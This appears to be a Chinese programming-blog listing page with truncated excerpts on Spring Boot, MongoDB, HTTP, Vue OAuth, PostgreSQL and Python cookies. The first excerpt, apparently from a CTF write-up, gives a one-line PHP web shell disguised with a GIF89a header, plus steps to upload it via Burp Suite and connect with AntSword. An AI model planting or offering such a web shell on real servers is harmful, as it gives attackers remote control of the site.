发现让我们上传文件, 首先在桌面创建一个y.phtml的文件,内容为 GIF89a <script language="php">eval($_POST['shell']);</script> 然后我们将它上传,提交时使用bp截取,修改一下格式,再放行 我们使用蚁剑连接,猜测路径为upload 完整 ...
分类:
Web程序 时间:
2020-11-12 14:13:31
阅读次数:
15
【转】 springBoot(2) 快速创建项目,初解jackson 快速创建项目,初解jackson 一、快速创建项目 springboot官网提供了工具类自动创建web应用:网址:http://start.spring.io/ 官网页面 1、快速创建一个 选择web代表这是一个web项目 这样就 ...
分类:
编程语言 时间:
2020-11-12 14:13:11
阅读次数:
12
查找admin集合下前10条数据: db.admin.find().limit(10); 插入数据 > post={table: "activityzones", ... fields: [ ... { ... name: "_id", ... type: "ObjectId", ... hidde ...
分类:
数据库 时间:
2020-11-12 13:54:07
阅读次数:
13
1.规划登录实现原理流程图 2.编写前端页面 <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html> <html> <head lang="en"> ...
分类:
其他好文 时间:
2020-11-12 13:41:46
阅读次数:
4
HTTP协议中http1.0与http1.1的区别 非持久连接和持久连接,http1.0使用非持久连接,每次请求TCP都得三次握手四次挥手,http1.1只要没有任一端提出断开,则保持连接。 HTTP请求的方法 HTTP/1.1协议中共定义了八种方法(有时也叫“动作”"Method"),来表明Req ...
分类:
Web程序 时间:
2020-11-12 13:27:49
阅读次数:
13
在Vue页面加载时动态发送请求获取微博授权url 1.1在components\common\lad_header.vue中写oauth动态获取微博授权URL // 获取微博登录地址 oauth_post().then((resp) => { consloe.log(resp) // {"code" ...
分类:
Web程序 时间:
2020-11-12 13:22:09
阅读次数:
11
1.RESTful风格API 详情查看博客地址:https://www.cnblogs.com/xiaonq/p/10053234.html 1.1什么是RESTful REST与技术无关,代表的是一种软件架构风格(REST是Representational State Transfer的简称,中 ...
在微信中,发送httpclient请求 使用了apache的组件 /** * post请求 * @param url * @param json * @return */ public static JSONObject doPost(String url,JSONObject json){ Clo ...
分类:
微信 时间:
2020-11-11 15:44:03
阅读次数:
19
#利用抓包工具,抓取需要cookie的网址一般cookie就在第一个post请求中,或与它挨着的地方里#网址就用浏览器的网址from urllib import requestfrom urllib import parse url='https://www.cnblogs.com/Eric-Z-H ...
分类:
其他好文 时间:
2020-11-08 17:51:35
阅读次数:
20
有时候我们会遇到这种情况(这种情况并不少见):用户schema中有很多对象,并且你想授权题用户访问这些表。你可以通过grant直接授权,但是当对象属主创建新的对象呢?你可能还需要再次授权,但是postgresql提供一个解决方案。 postgres=# create user a password ...
分类:
数据库 时间:
2020-11-08 16:43:59
阅读次数:
38